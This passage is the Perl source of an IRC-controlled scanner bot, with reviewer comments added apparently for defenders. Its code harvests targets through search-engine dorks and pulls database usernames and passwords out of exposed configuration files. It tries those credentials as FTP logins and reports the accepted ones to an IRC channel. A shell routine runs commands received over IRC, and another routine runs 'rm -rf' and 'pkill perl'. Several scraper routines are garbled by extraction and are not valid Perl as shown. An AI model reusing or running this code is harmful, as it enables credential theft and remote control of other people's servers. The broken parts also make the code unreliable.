if ($html =~ /db_host/i) {
# $userpass is a package global holding "user:xXx:pass".
$userpass = getUserPass($html);
&msg("$chan","$whmlogo 4$engine (13@12DATABASE15)10 15(7 http://".$site." 15) 4$userpass");
my $lulz = "http://".$site;
my $user = "";
my $pass = "";
# Capture group 2 is the host part of the URL (everything up to the first
# slash after the scheme, and containing a dot).
if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
my $host = $2;
my @ftpu = split(":xXx:", $userpass);
$user = $ftpu[0];
$pass = $ftpu[1];
my $ftpstat = "";
# A database user of the form "account_suffix" is cut down to the part before
# the first underscore (presumably the hosting account name; verify against
# the rest of the sample).
if($user =~ /_/) { @userz = split("_", $user); $user = $userz[0];}
ftp_connect($test1,$host,$user,$pass,$chan,$engine);
}
sleep(3);
}
}
}
}

# Attempts one FTP login against $host with the supplied credentials and, if
# the login is accepted, posts host, user and password to the scan channel and
# to $admin.
#   $_[0] source URL (unused here)   $_[1] host   $_[2] user   $_[3] password
#   $_[4] IRC channel                $_[5] engine label
# Detection: a single FTP login from the scanning host shortly after an HTTP
# request for a configuration file on the same site.
sub ftp_connect {
my $url = $_[0];
my $host = $_[1];
my $user = $_[2];
my $pass = $_[3];
my $chan = $_[4];
my $engine = $_[5];
# The flag is inverted relative to its name: it starts at 1 and is set to 0
# when the login succeeds.
my $success = 1;
# use is processed at compile time, so Net::FTP is loaded when the script
# starts, not when this sub runs.
use Net::FTP;
# Net::FTP->new returns undef when the connection fails; the method calls
# below are made without checking for that.
my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 2);
$success = 0 if $ftp->login($user,$pass);
$ftp->quit;
if ($success == 0) {
&msg("$chan","4$engine (13@12ACCEPT15) 15( 13".$host.":21 12".$user."13:12".$pass." 15)");
&msg("$admin","4$engine (13@12ACCEPT15) 15( 13".$host.":21 12".$user."13:12".$pass." 15)");
}
}

# getUserPass($string)
# Scans a fetched document for db_username / db_password assignments and
# returns them as one string of the form "<user>:xXx:<pass>". Either part is
# empty when no matching assignment is found.
sub getUserPass() {
my $string = $_[0];
# Lines are separated on CRLF only.
my @lol = split("\r\n", $string);
my $pass = "";
my $user = "";
foreach my $line (@lol) {
# Accepts the value in single or double quotes followed by ";"; the value is
# the third capture. A later matching line overwrites an earlier one.
if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
$pass = $3;
}
if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
$user = $3;
}
}
# ":xXx:" is the separator that whm() splits on.
return $user.":xXx:".$pass;
}

#########################################

# search_engine($chan, $bug, $dork, $engine, $logo)
# Dispatches the search phrase $dork to the one scraper whose name equals
# $engine (exact, case-sensitive string match), de-duplicates the hosts it
# returns with clean(), posts the raw and de-duplicated counts to $chan, and
# returns the de-duplicated list. $bug is accepted but not used here.
# Defender note: every scan module in this file obtains its target list
# through this function, so the search-engine traffic it produces precedes
# any request to a scanned host.
sub search_engine() {
my (@total,@clean);
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $logo = $_[4];
# An unknown $engine value matches none of the tests and yields an empty list.
if ($engine eq "Simbah") { my @google = google($dork); push(@total,@google); }
if ($engine eq "GooGle2") { my @google2 = &google2($dork); push(@total,@google2); }
if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); }
if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); }
if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); }
if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); }
if ($engine eq "KvaSiR") { my @kvasir = kvasir($dork); push(@total,@kvasir); }
if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); }
if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }
if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }
if ($engine eq "interia") { my @interia = &interia($dork); push(@total,@interia); }
if ($engine eq "QuinT") { my @quint = quint($dork); push(@total,@quint); }
if ($engine eq "Yahoo2") { my @yahoo2 = yahoo2($dork); push(@total,@yahoo2); }
if ($engine eq "bypass") { my @bypass = &bypass($dork); push(@total,@bypass); }
if ($engine eq "Pagina") { my @pagina = &pagina($dork); push(@total,@pagina); }
# clean() rewrites the elements of @total in place as well as returning the
# de-duplicated copy.
@clean = &clean(@total);
&msg("$chan","$logo(4@8$engine15)4 Total:0 (".scalar(@total).")4 Clean:0 (".scalar(@clean).") ");
return @clean;
}

#########################################

# isFound($link, $reqexp)
# Fetches $link with get_content() and returns 1 when the response body
# matches $reqexp, otherwise 0. $reqexp is interpolated into the match as a
# regular expression, not compared as a literal string.
sub isFound() {
my $status = 0;
my $link = $_[0];
my $reqexp = $_[1];
my $res = &get_content($link);
if ($res =~ /$reqexp/) { $status = 1 }
return $status;
}

# get_content($url)
# Performs one HTTP GET with LWP::UserAgent and returns the response body.
# The body is returned whatever the status code; the response is not checked
# for success. $uagent (the User-Agent string) is a file-level variable
# defined outside this excerpt.
sub get_content() {
my $url = $_[0];
my $ua = LWP::UserAgent->new(agent => $uagent);
# 7-second timeout per request.
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
return $res->content;
}

#########################################
# google($key)
# Scraper for google.com: requests result pages at start offsets 0..1000 in
# steps of 100 for the encoded phrase, and passes every captured link that
# does not contain "google" through links(), returning the combined list.
# NOTE(review): this listing is damaged by HTML extraction. "&quot;" appears
# to stand where a string delimiter was, and the match pattern has lost the
# markup it searched for, so the sub is not valid Perl as shown. The code is
# left exactly as extracted.
sub google() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=100){
my $search = ("http://www.google.com/search?q=&quot;.key($key)."&num=100&filter=0&start=".$i);
my $res = search_engine_query($search);
while ($res =~ m/\"]*)\//g) {
my $link = $1;
# Drop results that point back at the search engine itself.
if ($link !~ /google/){
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

# google2($key)
# Scraper for a country-specific Google domain: picks one entry of @doms at
# random, requests result pages at start offsets 1..191 in steps of 10, and
# passes captured links that do not contain "google" through links().
# The return statement sits inside the foreach over @doms, directly after the
# inner page loop, so only one randomly chosen domain is queried per call.
# $dom is not declared with my and is therefore a package global.
# NOTE(review): the listing is damaged by extraction - several @doms string
# literals are split across physical lines, "&quot;" appears to stand where a
# string delimiter was, and the match pattern has lost the markup it searched
# for. The code is left exactly as extracted.
sub google2() {
my @list;
my $key = $_[0];
my $b = 0;
my @doms =
("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.c
k","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu
","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.
mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru",
"rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","co
m.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
# The loop variable $domain is not used; a random element is taken instead.
foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
for ($b=1; $b<=200; $b+=10) {
my $search = ("http://www.google.&quot;.$dom."/search?num=5000&q=".&key($key)."&start=".$b."&sa=N");
my $res = &search_engine_query($search);
while ($res =~ m/\"]*)\//g) {
if ($1 !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
} return @list;
}
}

# alltheweb($key)
# Scraper selected by the engine name "AllTheWeb". For each captured link
# that does not contain "bingj" or "yahoo" it removes spaces, turns "%3f"
# back into "?", and passes the result through links().
# NOTE(review): the line that begins the for loop is truncated by extraction;
# the loop bounds, the request and the start of the match pattern are missing
# from this listing, so what is queried cannot be stated from here. The code
# is left exactly as extracted.
sub alltheweb() {
my @list;
my $key = $_[0];
for (my $i=0; $i/g) {
my $link = $1;
if ($link !~ /bingj|yahoo/) {
$link =~ s/ //g;
$link =~ s/%3f/\?/g;
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

# kvasir($key)
# Scraper for kvasir.no: requests result pages with the counter running from
# 10 to 1000 in steps of 100, captures the host part of every
# href="http://.../ link, skips hosts containing "kvasir", strips "<" and
# spaces, and passes each host through links().
# NOTE(review): "&quot;" in the URL string appears to be an extraction
# artefact standing where a string delimiter was. The code is left exactly
# as extracted.
sub kvasir() {
my @list;
my $key = $_[0];
for (my $i=10; $i<=1000; $i+=100){
my $search = ("http://www.kvasir.no/nettsok?q=&quot;.$i."&pageSize=100&q=".&key($key)."");
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
my $link = $1; if ($link !~ /kvasir/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep);
}
}
}
return @list;
}

# bing($key)
# Scraper for bing.com: requests result pages with "first" running from 1 to
# 1000 in steps of 10 and passes captured links that do not contain "msn",
# "live" or "bing" through links().
# A second definition of bing() appears later in the file.
# NOTE(review): "&quot;" appears to stand where a string delimiter was and
# the match pattern has lost the markup it searched for, so the sub is not
# valid Perl as shown. The code is left exactly as extracted.
sub bing() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=1000; $i+=10) {
my $search = ("http://www.bing.com/search?q=&quot;.key($key)."&filt=all&first=".$i."&FORM=PERE");
my $res = search_engine_query($search);
while ($res =~ m/\"]*)\//g) {
my $link = $1;
if ($link !~ /msn|live|bing/) {
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

# altavista($key)
# Scraper for it.altavista.com: requests result pages with "stq" running
# from 1 to 1000 in steps of 10, skips captures containing "altavista",
# strips "<" and spaces, and passes each capture through links().
# NOTE(review): "&quot;" appears to stand where a string delimiter was, and
# the match pattern as shown captures everything up to the next "/" - it has
# presumably lost a leading markup prefix in extraction. The code is left
# exactly as extracted.
sub altavista() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=1000; $i+=10){
my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=&quot;.key($key)."&stq=".$i);
my $res = search_engine_query($search);
while ($res =~ m/(.+?)\//g) {
my $link = $1;
if ($link !~ /altavista/){
$link =~ s/<//g;
$link =~ s/ //g;
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

# ask($key)
# Scraper for it.ask.com: requests result pages with "page" running from 0
# to 1000 in steps of 10, captures the target of every
# href="http://..." onmousedown= link, skips targets containing "ask.com",
# and passes each through links().
# NOTE(review): "&quot;" in the URL string appears to be an extraction
# artefact standing where a string delimiter was. The code is left exactly
# as extracted.
sub ask() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=10) {
my $search = ("http://it.ask.com/web?q=&quot;.key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i);
my $res = search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
my $link = $1;
if ($link !~ /ask\.com/){
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

# yahoo($key)
# Scraper for www.search.yahoo.com: issues 500 requests with "b" running from
# 1 to 500 in steps of 1, captures the text between "26u=" and "%26w=" in the
# response, skips captures containing "yahoo", and passes each through
# links().
# NOTE(review): "&quot;" in the URL string appears to be an extraction
# artefact standing where a string delimiter was. The code is left exactly
# as extracted.
sub yahoo() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=500; $i+=1) {
my $search = ("http://www.search.yahoo.com/search?p=&quot;.key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i);
my $res = search_engine_query($search);
while ($res =~ m/26u=(.*?)%26w=/g) {
my $link = $1;
if ($link!~ /yahoo/){
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}

# onet($key)
# Scraper for szukaj.onet.pl: requests result pages with the counter running
# from 1 to 1000 in steps of 100, captures the target of every
# <a href="http://..." link, skips targets containing "webcache" or "query",
# and passes each through links().
# NOTE(review): "&quot;" in the URL string appears to be an extraction
# artefact standing where a string delimiter was. The code is left exactly
# as extracted.
sub onet() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=100) {
my $search = ("http://szukaj.onet.pl/&quot;.$b.",query.html?qt=".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /webcache|query/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}

# seznam($key)
# Scraper for search.seznam.cz: requests result pages with "from" running
# from 1 to 1000 in steps of 100, captures the target of every
# <a href="http://..." title link, skips targets containing "seznam", and
# passes each through links().
# Unlike onet(), $b is not declared with my here, so the loop counter is the
# package variable $b.
# NOTE(review): "&quot;" in the URL string appears to be an extraction
# artefact standing where a string delimiter was. The code is left exactly
# as extracted.
sub seznam() {
my @list;
my $key = $_[0];
for ($b=1; $b<=1000; $b+=100) {
my $search = ("http://search.seznam.cz/?q=&quot;.&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {
if ($1 !~ /seznam/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}

# interia($key)
# Scraper selected by the engine name "interia". Captures that do not contain
# "google" or "interia" are passed through links().
# NOTE(review): the line that begins the for loop is truncated by extraction;
# the loop bounds, the request and the start of the match pattern are missing
# from this listing, so the queried URL cannot be stated from here. The code
# is left exactly as extracted.
sub interia() {
my @list;
my $key = $_[0];
for ($b = 0;$bhttp:\/\/(.+?)\/(.*)/g) {
my $link = $1;
if ($link!~ /google|interia/) {
my @grep=links($link);
push(@list,@grep);
}
}
}
return @list;
}

# quint($key)
# Scraper for quintura.com: requests pages 0..50, captures the host part of
# every <a href="http://.../ link (the opening quote is optional), skips hosts
# containing "quintura", and passes each through links().
# NOTE(review): "&quot;" in the URL string appears to be an extraction
# artefact standing where a string delimiter was. The code is left exactly
# as extracted.
sub quint() {
my @lst;
my $key = $_[0];
for (my $i=0; $i<=50; $i+=1){
my $search = ("http://quintura.com/?request=&quot;.key($key)."&tab=0&page=".$i."&tabid=");
my $res = search_engine_query($search);
while ($res =~ m/<a href=\"?http:\/\/(.+?)\//g) {
my $link = $1;
if ($link !~ /quintura/){
my @grep = links($link);
push(@lst,@grep);
}
}
}
return @lst;
}

# yahoo2($key)
# Scraper for regional <domain>.search.yahoo.com hosts: requests result pages
# with "b" running from 1 to 1000 in steps of 100, captures the host after
# "http%3a//", skips hosts containing "yahoo.com", strips "<" and spaces, and
# passes each through links().
# The return statement sits inside the foreach over @doms, directly after the
# page loop, so only the first entry ("id") is queried per call.
# Structure note: the brace that closes this sub is the lone "}" after the
# second bing() below. bypass(), pagina() and that bing() are therefore
# written inside yahoo2's body; as named subs they are still package-level
# definitions.
# NOTE(review): "&quot;" in the URL strings appears to be an extraction
# artefact standing where a string delimiter was. The code is left exactly
# as extracted.
sub yahoo2() {
my @list;
my $key = $_[0];
my $b = 0;
my @doms = ("id","au","br","ca","de","es","fr","it","uk","jp","kr","cn","th","vn","il","net","org","info");
foreach my $domain (@doms) { #$dom = $doms[rand(scalar(@doms))];
for (my $i=1; $i<=1000; $i+=100) {
my $search = ("http://&quot;.$domain.".search.yahoo.com/search?n=100&p=".&key($key)."&b=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/http\%3a\/\/(.+?)\//g) {
if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
}
}
} return @list;
}

# bypass($key)
# Sends the encoded phrase to the URL held in $bypass (a file-level variable
# defined outside this excerpt) as "?key=..." and collects links from the
# response through links().
# NOTE(review): the match pattern is empty in this listing (the commented-out
# line below it shows the same damaged pattern as the other scrapers), and
# $link is tested before the "my $link" declaration, so the test reads a
# package variable rather than the capture. Left exactly as extracted.
sub bypass() {
my @list;
my $key = $_[0];
my $search = ($bypass."?key=".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m//g) {
# while ($res =~ m/\"]*)\//g) {
if ($link !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
return @list;
}

# pagina($key)
# Scraper for startgoogle.startpagina.nl: requests "start" values 0..100 and
# passes captures that do not contain "pagina" through links().
# NOTE(review): the match pattern has lost the markup it searched for and is
# not valid Perl as shown. Left exactly as extracted.
sub pagina(){
my @list;
my $key = $_[0];
my $i = 0;
for ($i=0; $i<=100; $i+=1){
my $web=("http://startgoogle.startpagina.nl/index.php?q=&quot;.key($key)."&start=".$i."&origin=homepage&source=geentaal");
my $Res= search_engine_query($web);
while ($Res =~ m/\"]*)\//g){
if ($1 !~ /pagina|pagina's/){
my $k=$1;
my @grep=links($k);
push(@list,@grep);
}
}
}
return @list;
}

# bing($key) - second definition
# Same request loop and filter as the earlier bing(); the only visible
# difference is the "&" call form for search_engine_query. Being defined
# later, this one replaces the earlier definition.
sub bing() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=1000; $i+=10) {
my $search = ("http://www.bing.com/search?q=&quot;.key($key)."&filt=all&first=".$i."&FORM=PERE");
my $res = &search_engine_query($search);
while ($res =~ m/\"]*)\//g) {
my $link = $1;
if ($link !~ /msn|live|bing/) {
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}
# Closes yahoo2(), opened above.
}

#########################################

# clean(@items)
# Returns the arguments with runs of "/" collapsed to a single "/" and
# duplicates removed, keeping first-seen order.
# The foreach variable aliases the elements of @_, so the slash substitution
# also rewrites the caller's values in place.
sub clean() {
my @cln = ();
my %visit = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
# Post-increment: false the first time a value is seen, true afterwards.
next if $visit{$element}++;
push @cln, $element;
}
return @cln;
}

# key($dork)
# Hand-rolled URL encoding of a search phrase: spaces become "+" and a fixed
# set of punctuation characters is replaced by its percent escape. Works on a
# copy and returns the encoded string. Characters outside the listed set,
# including "%" itself, pass through unchanged.
sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
$dork =~ s/@/\%40/g;
$dork =~ s/\[/\%5B/g;
$dork =~ s/\]/\%5D/g;
# Repeats the "?" substitution made above; nothing is left to replace here.
$dork =~ s/\?/\%3F/g;
$dork =~ s/\=/\%3D/g;
$dork =~ s/\|/\%7C/g;
return $dork;
}

# links($link)
# Expands one scraped "host/path" string into three candidates, each ending
# in "/" and with "//" collapsed to "/": the link as given, the host alone,
# and the link with its last path segment removed. Returned in that order.
sub links() {
my @list;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
# Parent directory: drop everything after the last "/".
$hdir =~ s/(.*)\/[^\/]*$/$1/;
# Host: keep the leading run of host-name characters before the first "/".
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push(@list,$link,$host,$hdir);
return @list;
}

# search_engine_query($url)
# Fetches $url over a raw TCP connection to port 80 with a hand-written
# HTTP/1.0 GET and returns the response as one string, or "" when the
# connection or the request fails.
# Defender note: all scraper traffic in this file takes this path - plain
# HTTP/1.0 requests carrying only Host, "Accept: */*" and the User-Agent held
# in $uagent (defined outside this excerpt).
sub search_engine_query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
# Keep the leading run of host-name characters before the first "/".
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
# $host is interpolated as a pattern without quoting, so its dots match any
# character; the first match is removed to leave the path and query string.
$query =~ s/$host//;
if ($query eq "") { $query = "/"; }
# Errors inside the block are swallowed; the "or return" leaves only the
# eval, after which the still-empty $page is returned.
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
# NOTE(review): the right-hand side is missing in this listing - presumably
# a read from $sock that was lost in HTML extraction. Left as extracted.
my @pages = ;
$page = "@pages";
close($sock);
};
return $page;
}

#########################################

# shell($path, $cmd)
# Runs $cmd on the local host and relays its output, line by line, as IRC
# messages to $path (the reply target). A "cd <dir>" command is handled
# in-process with chdir so that it affects later commands.
# Defender note: this is the point where text received by the bot reaches the
# system shell. $cmd is interpolated into backticks unmodified, and the work
# is done in a double-forked grandchild, so the process that runs the command
# is not a direct child of the bot process that received it.
sub shell() {
my $path = $_[0];
my $cmd = $_[1];
if ($cmd =~ /cd (.*)/) {
chdir("$1") || &msg("$path","4No such file or directory");
return;
}
# $pid is not declared with my and is therefore a package global. The parent
# waits only for the intermediate child, which exits immediately.
elsif ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
# stderr (and descriptor 3) are redirected into the captured output.
my @output = `$cmd 2>&1 3>&1`;
my $c = 0;
foreach my $output (@output) {
$c++;
# chop removes the last character of each line whatever it is.
chop $output;
&msg("$path","$output");
# Pause 2 seconds after every 5 lines sent.
if ($c == 5) { $c = 0; sleep 2; }
}
exit;
}}
}

# isAdmin($nick)
# Returns 1 when $nick is string-equal to the file-level $admin value,
# otherwise 0. The check visible here is this nick comparison only.
sub isAdmin() {
my $status = 0;
my $nick = $_[0];
if ($nick eq $admin) { $status = 1; }
return $status;
}

# msg($target, $text)
# Sends "PRIVMSG <target> :<text>" through sendraw() on $IRC_cur_socket.
# Does nothing unless called with exactly two arguments. sendraw() and
# $IRC_cur_socket are defined outside this excerpt.
sub msg() {
return unless $#_ == 1;
sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}

# SIGN()
# Self-check on the two credit variables set at the top of the file: unless
# $powered contains "e" and $mail contains "tk", prints a taunt and replaces
# the process with a shell command that deletes the script file ($0) and
# kills perl processes.
# With the $mail value assigned at the top of this file the second test is
# true. No call site is visible in this excerpt.
# Defender note: $0 is interpolated into a shell command line, and the pkill
# is by process name, not limited to this script's own process.
sub SIGN() {
if (($powered !~ /e/)||($mail !~ /tk/)) {
print "\nLAMER DETECTED FVCK YOU. YOU NOT HACKER. U JUST SCRIPT KIDDIES\n\n";
exec("rm -rf $0 && pkill perl");
}
}

# nick($newnick)
# Sends "NICK <newnick>" through sendraw(). Does nothing unless called with
# exactly one argument.
# NOTE(review): sendraw() is called with the command string only, whereas
# msg() passes $IRC_cur_socket first; sendraw() is defined outside this
# excerpt, so whether both call forms are accepted cannot be told from here.
sub nick() {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}

# notice($target, $text)
# Sends "NOTICE <target> :<text>" through sendraw(). Does nothing unless
# called with exactly two arguments.
# NOTE(review): sendraw() is called with the command string only, whereas
# msg() passes $IRC_cur_socket first; sendraw() is defined outside this
# excerpt, so whether both call forms are accepted cannot be told from here.
sub notice() {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}